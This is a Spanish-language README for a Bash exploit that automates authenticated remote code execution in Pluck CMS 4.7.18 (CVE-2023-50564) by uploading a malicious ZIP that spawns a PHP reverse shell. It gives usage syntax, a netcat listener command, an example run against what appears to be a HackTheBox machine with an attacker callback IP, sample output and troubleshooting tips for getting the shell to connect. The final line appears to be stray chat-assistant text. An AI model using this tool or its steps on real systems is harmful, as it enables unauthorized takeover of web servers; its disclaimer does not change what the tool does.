
Exploit Bash que automatiza la ejecución remota de código autenticada en Pluck CMS 4.7.18 mediante la carga de un ZIP malicioso, desencadenando una shell inversa PHP para CVE-2023-50564.
Este script explota una vulnerabilidad de Ejecución Remota de Código (RCE) en Pluck CMS v4.7.18. La vulnerabilidad permite a un usuario malintencionado subir un archivo PHP malicioso al servidor y ejecutarlo, obteniendo ejecución remota de comandos en la máquina objetivo.
El script automatiza todo el proceso mediante:
Nota: El script requiere un listener de Netcat en la máquina del atacante para recibir el reverse shell.
Antes de ejecutar el script, asegúrate de lo siguiente:
./CVE-2023-50564 -h <host> -P <password> -i <IP> -p <port>
-h <host>: El host objetivo (ej., greenhorn.htb).-P <password>: La contraseña para el panel de administración de Pluck CMS (ej., abcd123).-i <IP>: La dirección IP del atacante para recibir el reverse shell.-p <port>: El puerto en el que está corriendo el listener de Netcat para capturar el reverse shell../CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Configurar el listener de Netcat: En la máquina del atacante, inicia un listener de Netcat en el puerto especificado:
nc -nvlp <port>
Por ejemplo:
nc -nvlp 9001
Ejecutar el script: Proporciona los parámetros requeridos al script, incluyendo el host, contraseña, dirección IP y puerto.
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Ejecución del script:
love.php)."RCE is waiting for you, please go take a look.", y el script finalizará después de registrar el tiempo tomado.Acceder al objetivo: Una vez que se active el reverse shell, la conexión aparecerá en tu listener de Netcat, dándote acceso remoto a la máquina objetivo.
image
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Netcat listener detected on port 9001.
Downloading reverse shell PHP exploit...
updating: love.php (deflated 60%)
Exploit zipped as loverce.zip and original PHP file removed.
Extracted Cookie: PHPSESSID=somecookievalue
Login successful!
ZIP file uploaded successfully.
RCE is waiting for you, please go take a look.
Script terminated. Total time taken: 70 seconds.
Puedes instalar curl y netcat usando los siguientes comandos si no están instalados:
sudo apt update
sudo apt install curl netcat
sudo yum install curl nc
Este script está destinado únicamente a fines educativos y de pruebas de penetración autorizadas. El uso no autorizado de este script es ilegal y poco ético. Siempre obtén la autorización adecuada antes de explotar cualquier vulnerabilidad en un sistema.
504 Gateway Time-out: El script puede encontrar este error al intentar ejecutar el reverse shell, pero esto no afecta el éxito de la ejecución del shell. El error generalmente se debe a que el servidor objetivo tarda demasiado en responder a la solicitud HTTP, pero el shell debería seguir funcionando.
Problemas con el Listener de Netcat: Si no recibes el reverse shell, asegúrate de que tu dirección IP y puerto estén configurados correctamente, y de que no haya restricciones de firewall que impidan que el objetivo se conecte de vuelta a tu máquina.
El script falla al iniciar sesión: Si falla el inicio de sesión en el panel de administración del CMS, verifica la contraseña proporcionada y asegúrate de que el CMS sea accesible en la máquina objetivo.
Házmelo saber si deseas alguna personalización o aclaración adicional en el README.